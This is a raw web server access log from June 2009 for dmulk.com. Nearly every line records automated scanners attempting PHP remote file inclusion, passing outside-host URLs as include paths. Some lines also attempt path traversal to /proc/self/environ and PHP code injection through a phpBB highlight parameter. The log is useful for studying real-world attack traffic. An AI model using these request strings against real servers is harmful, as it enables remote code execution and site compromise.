216.117.128.143 - - [21/Jun/2009:09:00:14 -0700] "GET /logs/access_081016.log/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:09:00:42 -0700] "GET /logs/access_081213.log%20%20/index2.php?showpage=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:09:00:43 -0700] "GET /logs/access_080526.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
216.117.128.143 - - [21/Jun/2009:09:00:45 -0700] "GET /logs/access_090109.log/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.105 - - [21/Jun/2009:09:01:17 -0700] "GET /logs/access_081105.log HTTP/1.0" 200 2973071 "-" "Nokia6600/1.0 (5.53.0) SymbianOS/7.0s Series60/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.0 Novarra-Vision/7.3" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:09:01:25 -0700] "GET /logs/phphtml.php?htmlclass_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:09:01:25 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:09:01:26 -0700] "GET /phphtml.php?htmlclass_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:09:01:29 -0700] "GET /logs/access_080710.log/phphtml.php?htmlclass_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [21/Jun/2009:09:01:31 -0700] "GET /logs/access_081007.log/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
69.237.82.158 - - [21/Jun/2009:09:01:31 -0700] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
69.237.82.158 - - [21/Jun/2009:09:01:31 -0700] "GET /logs/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:09:02:28 -0700] "GET /logs/access_080410.log//modules/Forums/admin/errors.php?error=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:09:02:28 -0700] "GET /modules/Forums/admin/errors.php?error=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:09:02:29 -0700] "GET /logs//modules/Forums/admin/errors.php?error=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:09:02:30 -0700] "GET /logs/access_080410.log//modules/Forums/admin/errors.php?error=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:09:02:30 -0700] "GET /modules/Forums/admin/errors.php?error=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:09:02:30 -0700] "GET /logs//modules/Forums/admin/errors.php?error=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:09:02:45 -0700] "GET /logs/access_090419.log%20%20/index2.php?showpage=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:02:49 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:02:49 -0700] "GET /logs/access_081007.log//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:02:50 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:02:50 -0700] "GET /logs/access_080514.log//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:02:56 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:02:56 -0700] "GET /logs/access_081007.log//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:02:57 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:02:57 -0700] "GET /logs/access_080514.log//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.117.128.143 - - [21/Jun/2009:09:03:07 -0700] "GET /logs/access_081016.log/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.194.87.219 - - [21/Jun/2009:09:03:09 -0700] "GET /logs//?_zb_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 200 105055 "-" "libwww-perl/5.822" "www.dmulk.com"
216.117.128.143 - - [21/Jun/2009:09:03:14 -0700] "GET /logs/access_081016.log/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:09:03:20 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:09:03:20 -0700] "GET /logs/access_080901.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:09:03:20 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:09:03:21 -0700] "GET /logs/access_080817.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.117.128.143 - - [21/Jun/2009:09:03:33 -0700] "GET /logs/access_090109.log/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.117.128.143 - - [21/Jun/2009:09:03:34 -0700] "GET /logs/access_090109.log/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.234.201.114 - - [21/Jun/2009:09:03:40 -0700] "GET /logs/access_080215.log/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.75.113.10 - - [21/Jun/2009:09:03:47 -0700] "GET /logs/access_081003.log//?log=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:09:03:50 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
211.75.113.10 - - [21/Jun/2009:09:03:53 -0700] "GET /logs//?log=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 200 105055 "-" "libwww-perl/5.805" "www.dmulk.com"
211.75.113.10 - - [21/Jun/2009:09:04:04 -0700] "GET /?log=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 200 21000 "-" "libwww-perl/5.805" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:09:04:15 -0700] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:04:42 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:04:42 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:04:42 -0700] "GET /logs/access_080513.log//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:04:45 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:04:46 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:04:46 -0700] "GET /logs/access_080513.log//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:05:03 -0700] "GET /logs/access_080513.log%20%20//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:05:18 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:05:18 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:05:18 -0700] "GET /logs/access_081007.log%20%20//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:05:21 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:05:21 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:05:21 -0700] "GET /logs/access_081007.log%20%20//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:05:30 -0700] "GET /logs/access_080513.log%20%20//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:05:51 -0700] "GET /logs/access_080514.log%20%20//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.172.140.17 - - [21/Jun/2009:09:05:51 -0700] "GET /logs/access_080514.log%20%20//skin/zero_vote/ask_password.php?dir=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:09:06:18 -0700] "GET /logs/access_081117.log//modules/Forums/admin/errors.php?error=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:09:06:18 -0700] "GET /logs/access_081117.log//modules/Forums/admin/errors.php?error=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:06:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:06:23 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:06:23 -0700] "GET /logs/access_080327.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:06:27 -0700] "GET /logs/access_080327.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:06:27 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.80.27 - - [21/Jun/2009:09:06:28 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.75.4.169 - - [21/Jun/2009:09:07:03 -0700] "GET /logs/access_080413.log//viewtopic.php?t=50&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sentrol.cl/components/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.75.4.169 - - [21/Jun/2009:09:07:04 -0700] "GET /viewtopic.php?t=50&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sentrol.cl/components/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.75.4.169 - - [21/Jun/2009:09:07:04 -0700] "GET /logs//viewtopic.php?t=50&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sentrol.cl/components/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.75.4.169 - - [21/Jun/2009:09:07:58 -0700] "GET /logs/access_080115.log//viewtopic.php?t=50&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sentrol.cl/components/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.4.169 - - [21/Jun/2009:09:07:58 -0700] "GET /viewtopic.php?t=50&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sentrol.cl/components/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.4.169 - - [21/Jun/2009:09:07:58 -0700] "GET /logs//viewtopic.php?t=50&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sentrol.cl/components/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
38.108.180.47 - - [21/Jun/2009:09:08:09 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.dmulk.com"
209.90.77.43 - - [21/Jun/2009:09:08:24 -0700] "GET /appserv/main.php?appserv_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.77.43 - - [21/Jun/2009:09:08:24 -0700] "GET /logs/access_090415.log//appserv/main.php?appserv_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.77.43 - - [21/Jun/2009:09:08:24 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.77.43 - - [21/Jun/2009:09:08:24 -0700] "GET /logs/access_081107.log//appserv/main.php?appserv_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
38.108.180.47 - - [21/Jun/2009:09:08:53 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.dmulk.com"
209.90.77.43 - - [21/Jun/2009:09:09:10 -0700] "GET /logs/access_090107.log//appserv/main.php?appserv_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:10:13 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [21/Jun/2009:09:10:16 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [21/Jun/2009:09:10:16 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [21/Jun/2009:09:10:16 -0700] "GET /logs/access_090125.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [21/Jun/2009:09:10:27 -0700] "GET /logs/access_080616.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
141.212.110.65 - - [21/Jun/2009:09:10:47 -0700] "GET /bikes/occcb/eBayISAPI.dll.htm HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:11:31 -0700] "GET /logs/access_081107.log//appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [21/Jun/2009:09:11:35 -0700] "GET /logs/access_080330.log//include/write.php?dir=http://samhwagolf.com/zb41//latest_skin/default/default_bbs/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:09:11:40 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:09:11:40 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.243.71 - - [21/Jun/2009:09:11:42 -0700] "GET /logs/access_080330.log//include/write.php?dir=http://samhwagolf.com/zb41//latest_skin/default/default_bbs/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [21/Jun/2009:09:11:47 -0700] "GET /logs//include/write.php?dir=http://samhwagolf.com/zb41//latest_skin/default/default_bbs/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:09:11:59 -0700] "GET /logs/access_080907.log/index2.php?showpage=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.16.54 - - [21/Jun/2009:09:12:30 -0700] "GET /logs//?mosConfig_absolute_path=http://www.aeronautica.gob.pa/modules/MambWeather/Savant2/Folder_Baru/background.gif???? HTTP/1.1" 200 105055 "-" "libwww-perl/5.826" "www.dmulk.com"
218.38.16.54 - - [21/Jun/2009:09:12:35 -0700] "GET /logs/access_090405.log%20//?mosConfig_absolute_path=http://www.aeronautica.gob.pa/modules/MambWeather/Savant2/Folder_Baru/background.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:09:12:38 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.42 - - [21/Jun/2009:09:12:40 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.90.77.43 - - [21/Jun/2009:09:12:41 -0700] "GET /logs/access_090415.log%20%20//appserv/main.php?appserv_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:09:12:51 -0700] "GET /index2.php?ID=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:09:12:51 -0700] "GET /logs/index2.php?ID=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:09:12:51 -0700] "GET /logs/access_090327.log/index2.php?ID=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.77.43 - - [21/Jun/2009:09:12:53 -0700] "GET /logs/access_090107.log%20%20//appserv/main.php?appserv_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.16.54 - - [21/Jun/2009:09:12:54 -0700] "GET /?mosConfig_absolute_path=http://www.aeronautica.gob.pa/modules/MambWeather/Savant2/Folder_Baru/background.gif???? HTTP/1.1" 200 21059 "-" "libwww-perl/5.826" "www.dmulk.com"
202.75.4.169 - - [21/Jun/2009:09:12:59 -0700] "GET /logs/access_080419.log//viewtopic.php?t=50&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sentrol.cl/components/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.4.169 - - [21/Jun/2009:09:13:00 -0700] "GET /viewtopic.php?t=50&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sentrol.cl/components/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.4.169 - - [21/Jun/2009:09:13:00 -0700] "GET /logs//viewtopic.php?t=50&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sentrol.cl/components/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:09:13:16 -0700] "GET /logs/access_080828.log/index2.php?ID=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:14:18 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:14:20 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:14:22 -0700] "GET /logs/access_080616.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.75.4.169 - - [21/Jun/2009:09:14:52 -0700] "GET /logs/access_090126.log//viewtopic.php?t=50&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sentrol.cl/components/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:09:15:07 -0700] "GET /errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:09:15:07 -0700] "GET /logs/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:09:15:07 -0700] "GET /logs/access_080929.log/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:09:15:07 -0700] "GET /logs/access_090210.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
